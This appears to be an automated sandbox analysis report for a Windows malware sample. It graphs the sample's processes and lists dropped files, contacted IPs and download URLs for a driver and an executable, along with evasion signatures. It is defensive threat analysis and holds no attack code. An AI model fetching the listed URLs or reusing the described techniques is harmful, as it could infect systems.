behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1541826 Sample: lUAc7lqa56.exe Startdate: 25/10/2024 Architecture: WINDOWS Score: 100 53 keyauth.win 2->53 61 Antivirus detection for dropped file 2->61 63 Antivirus / Scanner detection for submitted sample 2->63 65 Multi AV Scanner detection for dropped file 2->65 67 5 other signatures 2->67 9 lUAc7lqa56.exe 17 2->9         started        signatures3 process4 dnsIp5 55 185.101.104.122, 49730, 80 HOSTCLEAN-SRLRO Romania 9->55 57 keyauth.win 104.26.0.5, 443, 49737 CLOUDFLARENETUS United States 9->57 59 127.0.0.1 unknown unknown 9->59 45 C:\Windows\driverfo.sys, PE32+ 9->45 dropped 47 C:\Windows\Vulnerability.exe, PE32+ 9->47 dropped 49 C:\Users\user\AppData\...\driverfo[1].sys, PE32+ 9->49 dropped 51 C:\Users\user\...\Vulnerability[1].exe, PE32+ 9->51 dropped 77 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 9->77 79 Sample is not signed and drops a device driver 9->79 81 Tries to evade analysis by execution special instruction (VM detection) 9->81 83 4 other signatures 9->83 14 cmd.exe 1 9->14         started        17 cmd.exe 1 9->17         started        19 cmd.exe 1 9->19         started        21 3 other processes 9->21 file6 signatures7 process8 signatures9 85 Drops executables to the windows directory (C:\Windows) and starts them 14->85 23 Vulnerability.exe 2 18 14->23         started        27 certutil.exe 3 1 17->27         started        29 find.exe 1 17->29         started        31 find.exe 1 17->31         started        33 cmd.exe 1 19->33         started        process10 file11 43 C:\Users\user\AppData\Local\Temp\nULoYBmSWb, PE32+ 23->43 dropped 69 Antivirus detection for dropped file 23->69 71 Multi AV Scanner detection for dropped file 23->71 73 Accesses win32k, likely to find offsets for exploits 23->73 75 Machine Learning detection for dropped file 23->75 35 conhost.exe 23->35         started        37 WerFault.exe 2 27->37         started        39 conhost.exe 33->39         started        41 timeout.exe 1 33->41         started        signatures12 process13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.26.0.5
 keyauth.win United States
13335 CLOUDFLARENETUS false
185.101.104.122
 unknown Romania
57673 HOSTCLEAN-SRLRO false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
keyauth.win 104.26.0.5 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.101.104.122/driverfo.sys false
    		unknown
    http://185.101.104.122/Vulnerability.exe false
      		unknown